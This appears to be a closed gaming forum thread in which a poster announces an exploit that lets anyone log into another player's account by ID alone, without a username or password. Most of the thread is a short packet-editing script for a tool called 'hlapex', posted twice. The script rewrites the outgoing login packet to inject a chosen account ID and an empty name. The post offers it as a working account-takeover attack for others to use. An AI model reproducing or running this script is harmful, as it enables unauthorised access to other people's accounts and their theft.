Jump to content

Recommended Posts

Posted

A new xploit is avaible and allow an user to join to any account without know the user and password, you only need to know the account id.

 

this is the code that allows that with hlapex

 

you only change account with id you want to try

 

const
account=1;
procedure Init;
begin
end;
procedure Free;
begin
end;
begin
if FromServer then exit;
if pck[1]=#$08 then
begin
buf:=#$08;
WriteS('');
WriteD(account);
WriteD(0);
pck:=buf;
end;
end.

 

wow

Posted

A new xploit is avaible and allow an user to join to any account without know the user and password, you only need to know the account id.

 

this is the code that allows that with hlapex

 

you only change account with id you want to try

 

const
account=1;
procedure Init;
begin
end;
procedure Free;
begin
end;
begin
if FromServer then exit;
if pck[1]=#$08 then
begin
buf:=#$08;
WriteS('');
WriteD(account);
WriteD(0);
pck:=buf;
end;
end.

Guest
This topic is now closed to further replies.



×
×
  • Create New...